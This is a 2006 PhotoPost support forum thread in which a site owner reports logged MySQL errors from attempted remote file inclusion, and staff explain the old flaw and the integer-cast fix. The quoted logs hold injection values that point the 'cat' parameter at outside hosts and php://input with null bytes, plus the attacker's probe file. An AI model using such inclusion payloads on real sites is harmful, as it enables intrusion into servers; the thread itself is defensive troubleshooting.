PP5.5 - sql injection attempts !

flat · November 2nd, 2006, 05:03 PM

Hi,

I got today some error reports in my mails from photopost...
Here is one of the report :

Quote:

An error was encountered during execution of the query:

SELECT id, bigimage, cat, storecat, height, width FROM pp_photos WHERE approved=1 AND userid=5918 AND cat=//195.209.41.200/folder/info.txt ORDER BY date DESC LIMIT 1 [...]

Why is it possible to put text instead of the cat id number, in that MySQL query ? Shouldn't it be casted to (int) before been used into the query ?

I got a few different reports too, which prove that the guy was trying to do bad things with photopost :

Quote:

An error was encountered during execution of the query:

SELECT id, bigimage, cat, storecat, height, width FROM pp_photos WHERE approved=1 AND userid=2282 AND cat=//195.209.41.200/folder/info.txt ORDER BY date DESC LIMIT 1

Quote:

An error was encountered during execution of the query:

SELECT id, bigimage, cat, storecat, height, width FROM pp_photos WHERE approved=1 AND userid=2282 AND cat=ftps://195.137.160.66/info.txt ORDER BY date DESC LIMIT 1

Quote:

An error was encountered during execution of the query:

SELECT id, bigimage, cat, storecat, height, width FROM pp_photos WHERE approved=1 AND userid=8771 AND cat=ftp://195.137.160.66/info.txt ORDER BY date DESC LIMIT 1

Quote:

An error was encountered during execution of the query:

SELECT id, bigimage, cat, storecat, height, width FROM pp_photos WHERE approved=1 AND userid=5918 AND cat=php://input\0 ORDER BY date DESC LIMIT 1

Quote:

An error was encountered during execution of the query:

SELECT id, bigimage, cat, storecat, height, width FROM pp_photos WHERE approved=1 AND userid=2099 AND cat=//195.209.41.200/folder/info.txt\0 ORDER BY date DESC LIMIT 1

On (russian server...), we can read the following content :

Quote:

<?
echo(md5("neverdoharm"));
exit;
die;
?>

flat · November 2nd, 2006, 05:23 PM

P.S : for security reason, I don't paste here apache's access log, but I can PM it if needed...

Michael P · November 2nd, 2006, 06:10 PM

It's someone trying to exploit very old versions of PhotoPost; these queries will only generate errors with versions released in the past year and a half or later.

flat · November 2nd, 2006, 07:08 PM

So, why do I get these bug reports with PP5.5 ?
I think my installation is up to date.

I tried to reproduce the error on viperalley.com, and I got an "unrecoverable error"... so I guess there is still something wrong with PP5 ?

Chuck S · November 2nd, 2006, 07:47 PM

What Michael is saying is that your going to get a mysql error email but it does not indicate there is an issue.

The issue is the security related sites that freely post vulnerabilities in software so you have people going around trying to exploit things. The exploit is from Photopost 4.8 and below and your not able to be exploited even though people will still try.

Michael P · November 2nd, 2006, 08:09 PM

'cat' in showmembers.php used to be a STRING which could give an error, but prevented SQL injections. In an update we made 'cat' => INT to remove the error messages entirely.

You can change the first typecast to reflect INT versus STRING.

flat · November 4th, 2006, 06:17 AM

Thanks for these explanations, I feel safe now